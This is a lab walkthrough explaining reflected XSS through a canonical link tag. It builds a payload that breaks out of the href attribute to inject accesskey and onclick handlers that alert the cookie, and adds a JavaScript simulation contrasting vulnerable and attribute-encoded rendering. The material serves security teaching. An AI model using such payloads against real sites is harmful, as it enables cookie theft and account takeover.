Reflected XSS in Canonical Link Tag

Objective

Once you land on the lab's home page, view the page source (Ctrl+U) and look at how the canonical link tag in the <head> section is built: the URL you requested is reflected into its href attribute.

What is a canonical URL

A canonical URL is the URL of the best representative page from a group of duplicate pages, according to Google. For example, if you have two URLs for the same page (such as example.com?dress=1234 and example.com/dresses/1234), Google chooses one as canonical.

Because the requested URL is reflected into that href attribute without encoding, a quote character in the URL breaks out of the attribute value, and anything after it is parsed as further attributes of the link tag. That lets you inject an accesskey attribute together with an event handler.

What is the accessKey attribute

The accesskey global attribute provides a hint for generating a keyboard shortcut for the current element. The attribute value must consist of a single printable character (which includes accented and other characters that can be generated by the keyboard).

You define it as accesskey="x", and the victim triggers the element by pressing the shortcut for that key. Which modifier keys are required depends on the browser and operating system (for example Alt+key in Chrome on Windows, Alt+Shift+key in Firefox on Windows, Ctrl+Option+key on macOS), so for this lab you assume the simulated victim presses the relevant combination, such as Alt+X.

Crafting the Payload

  1. Defining the accesskey attribute

    accesskey="x"
    
  2. Combining with an event handler that fires when the element is activated

    accesskey="x" onclick=alert(1)
    
  3. Final Payload

    The lab's canonical tag wraps the reflected URL in single quotes, so the payload uses single quotes to break out:
    <link rel="canonical" href='https://PATH-TO-LAB/$input'/>
    input = ?'accesskey='x'onclick='alert(document.cookie)'

    Rendered tag:
    <link rel="canonical" href='https://PATH-TO-LAB/?'accesskey='x'onclick='alert(document.cookie)''/>

    The first ' in the input closes the href value; accesskey and onclick then become real attributes of the link element, and the stray ' left before /> is tolerated by the browser's parser.
    
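The following is an added example, not code from the original write-up or from the lab itself. It simulates the string concatenation a vulnerable template effectively performs when it reflects the request URL into the canonical link tag, parses the resulting tag with a small attribute tokenizer that follows the HTML tokenizer's rule that a new attribute may start right after a closing quote, and contrasts it with a rendering that attribute-encodes the reflected value. LAB_ORIGIN is a placeholder, and it is assumed that the decoded request target is reflected as-is.

```javascript
// Added example, not part of the original write-up or the lab's code.
// LAB_ORIGIN is a placeholder; the decoded request target is assumed to be
// reflected into the href attribute unchanged.
const LAB_ORIGIN = "https://PATH-TO-LAB";

// Vulnerable: request target dropped into a single-quoted href without encoding.
function renderCanonicalVulnerable(requestTarget) {
  return `<link rel="canonical" href='${LAB_ORIGIN}${requestTarget}'/>`;
}

// Hardened: encode the characters that can end an attribute value or open a tag.
function encodeHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCanonicalSafe(requestTarget) {
  return `<link rel="canonical" href='${LAB_ORIGIN}${encodeHtmlAttribute(requestTarget)}'/>`;
}

// Minimal tokenizer for the attributes of one start tag. Like the HTML spec's
// tokenizer, it lets a new attribute name begin directly after a closing quote
// with no whitespace in between, which is what makes href='...'accesskey='x' parse.
// Character references are left undecoded; duplicate attributes keep the first value.
function parseTagAttributes(tag) {
  const s = tag.replace(/^<\w+/, "").replace(/\/?>$/, "");
  const attrs = {};
  let i = 0;
  while (i < s.length) {
    while (i < s.length && /[\s\/]/.test(s[i])) i++;               // before attribute name
    if (i >= s.length) break;
    let name = "";
    while (i < s.length && !/[\s=\/]/.test(s[i])) name += s[i++]; // attribute name
    while (i < s.length && /\s/.test(s[i])) i++;
    let value = "";
    if (s[i] === "=") {
      i++;
      while (i < s.length && /\s/.test(s[i])) i++;
      const quote = s[i];
      if (quote === "'" || quote === '"') {
        i++;
        while (i < s.length && s[i] !== quote) value += s[i++];    // quoted value
        i++;                                                        // closing quote
      } else {
        while (i < s.length && !/[\s>]/.test(s[i])) value += s[i++]; // unquoted value
      }
    }
    const key = name.toLowerCase();
    if (key && !(key in attrs)) attrs[key] = value;
  }
  return attrs;
}

// The write-up's payload as the request target (query string with the injected attributes).
const PAYLOAD = "/?'accesskey='x'onclick='alert(document.cookie)'";

console.log(parseTagAttributes(renderCanonicalVulnerable(PAYLOAD))); // accesskey and onclick present
console.log(parseTagAttributes(renderCanonicalSafe(PAYLOAD)));       // only rel and href
```

Running it shows the vulnerable rendering producing separate accesskey and onclick attributes on the link element, while the encoded rendering keeps the whole payload inside the href value, where it is inert.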

Modify the payload according to your lab's URL, fire it, and press the key combination. You should see something similar to this: